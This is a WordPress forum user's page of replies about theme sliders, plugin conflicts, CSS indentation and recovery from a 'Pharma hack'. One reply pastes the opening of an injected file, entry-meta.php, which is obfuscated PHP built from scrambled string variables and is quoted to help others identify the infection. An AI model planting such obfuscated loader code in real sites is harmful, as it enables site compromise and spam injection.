Forum Replies Created
Forum: Themes and Templates
In reply to: Twenty fourteen – how to implement main sliderI was able to figure it out.
Forum: Themes and Templates
In reply to: Twenty fourteen – how to implement main sliderStill experimenting….
While I am on the ‘customize’ section,I see a mock version of the website. And now the slider works (with 3 images). But when I go to view the website itself, even a different browser,
By the way, I presume for this feature, it does not matter which post format one chooses, right?
I am no expert, but from my reading, .wmv files are strictly microsoft nonsense, and should be avoided if you expect your work to be played on a variety of platforms. mp4, ogg, webM are the standards for HTML5. There are some easy to use codec converters for Windows and/or Mac so you can re-encode your video files.
As a “political statement”, since year 2010 I have avoided everything to do with proprietary platforms, having been bitten hard by Apple and Microsoft nonsense. I only do opensource now.
Forum: Plugins
In reply to: [oik] Fatal error: Cannot redeclare image()Unfortunately, this leads to this error:
Fatal error: Cannot redeclare blockquote() (previously declared in /home/…./wp-content/plugins/oik/ in /home/…./wp-content/themes/overall/framework/options/option_shortcodes.php on line 236Strange two development teams should choose the same function calls.
At any rate, is there anything more to do — one cannot comment out all of your functions (!!).Forum: Plugins
In reply to: [oik] Fatal error: Cannot redeclare image()duplicate responses on my part
Forum: Plugins
In reply to: [MVIS Security Center] rerun core check does not show any differecesStefan!
Just wait I bit, I posed the above question to my webhost, they will tell me what needs to be done. Also, in my next attempt I tried /phpinfo.php which makes more sense that my original line.The above results were because phpinfo.php was not being properly called.
Forum: Plugins
In reply to: [MVIS Security Center] rerun core check does not show any differecesHello Stefan,
I am not sure how to invoke phpinfo(). I tried
But that only returned
Server Name: Your IP:
which is not very helpful.
Forum: Plugins
In reply to: [MVIS Security Center] rerun core check does not show any differecesI just tried this with something simple, like remove license.txt. Re-run does update, so for some reason it does not see my php.ini edits. Any suggestions why?
Forum: Fixing WordPress
In reply to: Pharma hack — my way to recover from itOops, I made a major oversight. Very important that you also search for a file within twentyten called “entry-meta.php” and delete it (or rather, always first rename, and then delete if all else is functioning properly). It is not a part of twentyten theme.
Here is the beginning of the file contents for my infection:
<?php $embassies = '=7Ue"i';$cultured ='(mV""6s)';$layton='['; $dyne = ')'; $brownie ='a'; $costuming = '[';$handled = '$_fat3teu';$clutch='A)Di(]Q'; $duck='e66T)TT"e'; $cylinders= 'Dcec';$earners = '[a(r;;O';$lamenting ='=o$R'; $fay='uEK$$(]y'; $gambling ='_'; $lobbied ='Od'; $cyclist='d(_7i'; $epithets ='saaL'; $corking ='_'; $grimace = 'E'; $hunk ='_7';$headmaster ='seif_F7e';$dracula='r,'; $hushing='Ee(ysedi'; $elnora = '_Tst';$knotty ='aa6)te)'; $charges = 'C'; $deaconess= 'M'; $employ= 'i'; $displacements='"';$leandra= '"E$SdC';
@jan Demowski
Thanks for the handy summary of how to make WordPress more secure!!!Forum: Fixing WordPress
In reply to: unordered or ordered lists not indentingOk, I have my question answered. Thanks for the great support.
Forum: Fixing WordPress
In reply to: unordered or ordered lists not indentingAgain, many fine thanks.
These various descriptors (I guess they are properly called selectors), like .page_content_text, — are these peculiar to wordpress, my specific Theme authors, or are these common to all style.css files? I just googled searched and found no hits. Checking here and here I also did not find the keywords either.
So I guess they are particular to the Theme??
At any rate, why isn’t position significant for selectors? BUT, after checking the style.css again. I realize that the only forming into “chapters” is accomplished by comments. In terms of code, it is all a single long file!!
And with that I promise not to ask any more questions!!
With regards!Forum: Fixing WordPress
In reply to: unordered or ordered lists not indentingThanks, Seacoast!!
Is it necessary to put your suggestion right next to the other .page_content_text descriptor? (Above? or below?)And also, if you don’t mind, where do you think I should look in the style sheet to change the default font size for the pages content?